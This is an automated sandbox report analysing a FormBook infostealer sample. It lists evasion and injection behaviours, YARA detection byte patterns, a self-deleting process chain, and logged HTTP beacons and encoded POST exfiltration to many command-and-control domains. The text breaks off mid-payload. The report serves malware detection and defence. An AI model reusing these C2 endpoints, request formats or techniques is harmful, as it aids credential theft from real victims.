Loading ...

Play interactive tourEdit tour

Analysis Report Scn14.092020.scr

Overview

General Information

Sample Name:Scn14.092020.scr (renamed file extension from scr to exe)
Analysis ID:285167
MD5:f3dcebdfd88e627e79f078f41a676b76
SHA1:7837347cbb14d59cc979731c88011df78dd62ae4
SHA256:6af2c88ffcb5d4290c1bef29781f58505d75654ea54d42ee04d59b93e723c799

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Binary contains a suspicious time stamp
Hides threads from debuggers
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Scn14.092020.exe (PID: 4784 cmdline: 'C:\Users\user\Desktop\Scn14.092020.exe' MD5: F3DCEBDFD88E627E79F078F41A676B76)
    • Scn14.092020.exe (PID: 6292 cmdline: C:\Users\user\Desktop\Scn14.092020.exe MD5: F3DCEBDFD88E627E79F078F41A676B76)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 6944 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 5656 cmdline: /c del 'C:\Users\user\Desktop\Scn14.092020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x15fd9:$sqlite3step: 68 34 1C 7B E1
    • 0x160ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16008:$sqlite3text: 68 38 2A 90 C5
    • 0x1612d:$sqlite3text: 68 38 2A 90 C5
    • 0x1601b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16143:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.Scn14.092020.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.Scn14.092020.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13475:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12f61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13577:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x136ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x857a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x121dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x92f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x182f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1936a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.Scn14.092020.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x153d9:$sqlite3step: 68 34 1C 7B E1
        • 0x154ec:$sqlite3step: 68 34 1C 7B E1
        • 0x15408:$sqlite3text: 68 38 2A 90 C5
        • 0x1552d:$sqlite3text: 68 38 2A 90 C5
        • 0x1541b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15543:$sqlite3blob: 68 53 D8 7F 8C
        1.2.Scn14.092020.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.Scn14.092020.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18ef7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19f6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: Scn14.092020.exeVirustotal: Detection: 20%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.Scn14.092020.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C7F460 FindFirstFileW,FindNextFileW,FindClose,6_2_02C7F460
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C7F459 FindFirstFileW,FindNextFileW,FindClose,6_2_02C7F459
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_02C7F585 FindFirstFileW,FindNextFileW,FindClose,6_2_02C7F585
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 4x nop then pop edi1_2_00415001
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 4x nop then pop edi1_2_0040C119
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi6_2_02C85001
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi6_2_02C7C119

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49743
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49772
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49787
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=HNt6bE8MfKrAhK/pt1sF0411gOBLJ9Uo/gJYn3fY8ue0UhpQnU4ulW+T1ESascm7BSDz HTTP/1.1Host: www.nola3d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=cO0bqnodE8Uodepscc2XXc+fybp4dBOkcNItlx0mXpHFPbxkNxOWsoUK9YvQ74iaK1ga&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.keebcat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=viBS6Wze00HUNqFEE58ery/tqe73OVEI1otdtPhhnn8HDYG2Px46lSa5vpvmwenp9VWv HTTP/1.1Host: www.chehol.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=VEf8k5jTZUymsLuztDlUroR4Tha6hY/2aUGXaeeuAgJZc/heECk8lEdTluj46t1OBa8z&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.jblmhomestore.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=iaRy2CcIG08yRATteF/h4niYl8g0zTtWlPvlrUXVcPKgWlu5QOCPyX+cRpPsLMouC6x2 HTTP/1.1Host: www.theghostfestival.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=06wv+NhoHjlhWQUEJX2w+vK/IFNJKXsiSbpyW5561s6/I+0VZrqwpkfEjDU5XNQldOlk&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.thebardi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=3F4BTbkTDsrb23tZAXb3hdJ3+Zxxneo5KOr91LRTQbT8RfY+vB5Yp2XFHvJayoJ2l/qV HTTP/1.1Host: www.martjeje2.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=dLiHs7tqNZzpikHCi85ytJ6zSazBJfKYHrDOt6j0CIH249LGHEOsf8+JagFD9t222TfN&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.isabellelinhnguyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=KZXmcMedBwfhNG72Yprv36X6G3gBjgWEN6ED81KrdGuEeSGip76GxhQuMTXo2uu4NyLJ HTTP/1.1Host: www.revolucaomindfulness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=rlkmmCaXt+AMyrw/MBwq/BSknyHni0kPKYXwYo5rBrAjCFj+y3ydrJyfUTRA3QRnBG+G&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.krewebijoux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=6KwpPXUiwFX7ZBA9OodNm3YLSATd2KUq4kH3sDUsuv0xVz64ikFWE+1HwWsjSUW/OVbp HTTP/1.1Host: www.environmentsafetymemphis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA90d4Z59dcBU3&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.nittayabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFSfl3ZRuG6Nl HTTP/1.1Host: www.ashleygrady.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qOyDoR5/Ss4I&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 209.99.40.222 209.99.40.222
          Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
          Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: CYBERDYNELR CYBERDYNELR
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 39 6e 39 36 32 70 70 63 66 48 47 45 72 4c 4e 6e 65 74 54 6e 63 53 35 68 4a 48 66 76 73 57 6d 36 46 68 67 61 54 4b 44 59 6b 7a 47 70 62 71 30 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 66 4d 64 4a 78 74 4e 67 38 65 74 55 74 74 73 31 75 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: vP=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tp9n962ppcfHGErLNnetTncS5hJHfvsWm6FhgaTKDYkzGpbq0~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOfMdJxtNg8etUtts1uw).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.chehol.directoryConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.chehol.directoryUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.chehol.directory/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 67 67 31 6f 6b 32 43 76 35 31 54 67 59 49 6b 5a 57 64 70 67 32 31 65 4f 6c 72 6e 46 4a 78 63 59 6d 4e 63 71 6f 6f 6c 47 72 6c 67 6a 46 72 33 6f 49 42 6c 31 72 6e 7a 41 39 36 72 4c 28 5f 28 37 32 32 50 67 50 5a 68 79 62 4d 39 66 35 4a 39 70 76 79 7e 62 35 73 6d 76 47 4f 46 36 6d 43 69 6f 61 4f 74 2d 39 6f 76 4d 4e 4c 47 4e 35 73 44 31 47 2d 74 58 52 4c 72 32 7a 2d 76 52 62 57 71 66 55 76 56 54 59 68 51 61 57 69 70 62 4b 52 6a 78 6a 6c 66 53 34 76 66 6e 51 30 52 55 38 34 31 64 63 30 52 70 73 59 48 56 45 65 54 4c 6a 33 63 57 62 72 6b 4f 52 4c 30 58 44 4b 71 6e 4c 57 5a 55 55 4e 6c 43 67 66 70 54 39 33 73 48 53 4d 66 43 6d 73 62 6d 51 74 68 64 7e 43 67 7a 39 6e 6f 33 66 34 6e 79 6a 44 38 47 31 4f 50 4b 4e 79 6a 66 6a 5f 68 44 34 4c 4d 50 62 69 4f 64 68 48 34 47 38 46 38 52 55 47 79 54 49 51 71 61 30 68 33 43 56 64 74 62 50 6f 74 64 4a 48 33 4d 55 56 30 5a 42 76 63 4e 78 79 49 49 79 4c 37 6c 48 44 38 67 6e 39 75 34 57 67 74 74 45 33 6e 48 77 6a 35 31 51 41 64 36 63 67 63 43 43 79 68 38 30 35 31 31 66 47 6d 68 41 36 44 33 63 76 34 70 32 4b 62 6d 45 45 43 64 69 55 59 2d 67 5a 50 59 52 6b 74 6d 7a 4b 74 5a 54 70 43 55 37 41 36 37 37 5f 47 34 6c 6b 6b 65 33 43 30 44 64 47 6d 31 72 43 54 58 35 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: vP=gg1ok2Cv51TgYIkZWdpg21eOlrnFJxcYmNcqoolGrlgjFr3oIBl1rnzA96rL(_(722PgPZhybM9f5J9pvy~b5smvGOF6mCioaOt-9ovMNLGN5sD1G-tXRLr2z-vRbWqfUvVTYhQaWipbKRjxjlfS4vfnQ0RU841dc0RpsYHVEeTLj3cWbrkORL0XDKqnLWZUUNlCgfpT93sHSMfCmsbmQthd~Cgz9no3f4nyjD8G1OPKNyjfj_hD4LMPbiOdhH4G8F8RUGyTIQqa0h3CVdtbPotdJH3MUV0ZBvcNxyIIyL7lHD8gn9u4WgttE3nHwj51QAd6cgcCCyh80511fGmhA6D3cv4p2KbmEECdiUY-gZPYRktmzKtZTpCU7A677_G4lkke3C0DdGm1rCTX5g).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.jblmhomestore.netConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.jblmhomestore.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jblmhomestore.net/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 61 47 72 47 36 65 50 42 55 7a 72 52 30 63 7a 62 34 56 70 4d 72 64 6c 31 57 54 50 6d 75 34 76 53 4a 30 6a 49 50 2d 44 7a 48 79 6f 64 63 37 68 78 4b 43 4a 59 70 53 49 44 7e 4d 6a 36 6e 73 42 4f 44 4a 39 44 76 77 6b 47 6e 55 4c 59 30 4e 66 55 37 43 47 44 51 50 32 6a 55 41 71 6b 7e 6f 79 68 77 41 49 68 63 69 54 5a 61 57 6b 37 32 6d 53 74 6b 38 49 58 63 49 70 47 50 62 28 48 28 62 7e 37 56 6a 41 57 34 62 73 4d 48 45 44 50 71 50 55 6e 63 54 65 46 4f 7a 6d 2d 48 62 70 47 7e 37 67 34 70 33 7e 61 28 70 6a 61 6e 77 70 52 73 4a 78 75 77 62 38 53 6a 4f 4a 2d 37 76 6b 63 65 31 67 6a 28 67 67 2d 79 34 32 4d 4b 7a 49 69 57 57 6d 46 6c 53 51 43 63 4c 66 43 32 51 4b 6e 75 74 30 32 72 43 6a 42 76 33 74 67 55 64 74 54 7e 31 7e 65 70 6f 49 64 53 69 62 46 6f 5f 35 43 39 6d 65 46 55 6e 73 6e 50 4b 70 4a 31 7a 68 5a 32 38 61 77 4a 55 4b 67 28 59 32 4c 32 41 31 36 36 67 63 6a 54 65 49 58 38 5f 39 38 7e 36 70 62 33 5a 65 42 4b 4c 69 69 59 46 52 33 30 50 47 4a 63 58 67 51 32 56 5a 33 55 44 6d 59 39 56 6c 59 7e 50 76 76 42 76 59 67 38 4c 6a 34 6c 30 56 41 6e 39 45 38 77 34 51 71 4c 34 62 55 56 45 6b 6a 53 5f 44 61 47 5a 4a 51 51 6a 57 59 4a 77 62 66 51 70 71 52 35 4f 78 5f 70 57 34 74 6d 4f 4c 6b 45 5f 57 6f 69 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: vP=aGrG6ePBUzrR0czb4VpMrdl1WTPmu4vSJ0jIP-DzHyodc7hxKCJYpSID~Mj6nsBODJ9DvwkGnULY0NfU7CGDQP2jUAqk~oyhwAIhciTZaWk72mStk8IXcIpGPb(H(b~7VjAW4bsMHEDPqPUncTeFOzm-HbpG~7g4p3~a(pjanwpRsJxuwb8SjOJ-7vkce1gj(gg-y42MKzIiWWmFlSQCcLfC2QKnut02rCjBv3tgUdtT~1~epoIdSibFo_5C9meFUnsnPKpJ1zhZ28awJUKg(Y2L2A166gcjTeIX8_98~6pb3ZeBKLiiYFR30PGJcXgQ2VZ3UDmY9VlY~PvvBvYg8Lj4l0VAn9E8w4QqL4bUVEkjS_DaGZJQQjWYJwbfQpqR5Ox_pW4tmOLkE_WoiQ).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.theghostfestival.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.theghostfestival.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.theghostfestival.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 74 59 6c 49 6f 69 34 45 50 7a 38 61 52 51 75 59 43 68 72 5f 75 69 61 63 75 76 4d 41 39 58 35 50 68 4c 43 33 33 54 50 4b 58 64 53 39 51 30 4b 38 41 72 33 65 68 79 50 77 48 63 58 79 4d 4e 59 54 43 4b 38 50 72 53 48 49 62 6f 6f 71 47 63 39 36 6c 6b 6c 63 63 57 48 43 5a 62 71 32 66 61 42 48 38 54 70 72 53 32 6a 59 64 6e 78 5f 44 38 6c 4b 46 37 73 5a 43 75 77 5f 6b 75 72 62 4c 62 41 77 4a 46 51 49 45 72 74 59 68 2d 5a 68 55 6c 45 43 38 5f 4b 75 6b 57 61 37 4d 46 49 2d 4d 36 36 71 32 42 6b 4a 63 58 79 53 6b 49 35 47 71 67 63 49 67 54 71 49 73 4c 70 54 78 5a 57 36 39 42 4e 6c 57 6f 59 59 77 65 52 54 62 54 42 70 4c 73 79 4a 67 56 46 6d 75 73 4f 59 56 49 43 65 4e 42 4f 45 66 68 51 2d 36 61 43 50 49 42 62 72 6f 72 36 2d 68 56 30 63 31 39 54 42 66 41 7e 44 5a 30 56 4d 74 57 79 45 66 57 43 55 42 66 36 56 63 42 44 39 6f 71 54 58 57 53 56 55 41 6d 6b 33 37 34 31 6b 7e 48 48 51 71 71 35 54 4f 6d 69 32 6b 45 45 77 32 46 64 50 57 45 48 32 5a 62 6d 76 77 4f 34 4a 48 31 70 37 44 2d 6b 74 56 72 50 63 4e 6a 31 35 48 51 77 64 65 57 36 52 34 2d 62 37 74 5f 6d 6a 6e 4a 43 51 37 34 61 4a 49 39 33 79 68 64 6b 52 59 50 31 6e 58 42 73 4d 70 55 64 42 58 6d 4c 74 38 2d 79 78 36 33 65 79 75 6f 6a 67 4b 4e 5a 4f 46 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: vP=tYlIoi4EPz8aRQuYChr_uiacuvMA9X5PhLC33TPKXdS9Q0K8Ar3ehyPwHcXyMNYTCK8PrSHIbooqGc96lklccWHCZbq2faBH8TprS2jYdnx_D8lKF7sZCuw_kurbLbAwJFQIErtYh-ZhUlEC8_KukWa7MFI-M66q2BkJcXySkI5GqgcIgTqIsLpTxZW69BNlWoYYweRTbTBpLsyJgVFmusOYVICeNBOEfhQ-6aCPIBbror6-hV0c19TBfA~DZ0VMtWyEfWCUBf6VcBD9oqTXWSVUAmk3741k~HHQqq5TOmi2kEEw2FdPWEH2ZbmvwO4JH1p7D-ktVrPcNj15HQwdeW6R4-b7t_mjnJCQ74aJI93yhdkRYP1nXBsMpUdBXmLt8-yx63eyuojgKNZOFQ).
          Source: global trafficHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.thebardi.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.thebardi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thebardi.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 37 34 45 56 67 6f 70 65 48 77 6c 52 58 33 42 50 56 43 48 71 73 36 6d 72 44 41 52 30 41 79 51 6f 45 4c 77 34 46 4c 70 41 6b 5f 53 66 50 76 4d 75 56 72 44 6a 71 68 54 47 68 67 45 47 4c 4e 67 67 61 61 73 44 4c 4c 74 58 55 63 5a 35 6c 4f 55 36 36 74 56 39 74 5f 55 45 5a 6a 34 4d 66 48 59 5a 42 58 32 4d 42 5a 57 6a 46 6b 64 73 44 41 64 4a 42 71 35 73 50 32 50 70 49 72 38 76 42 78 42 76 31 57 6d 45 67 54 37 35 51 4d 45 62 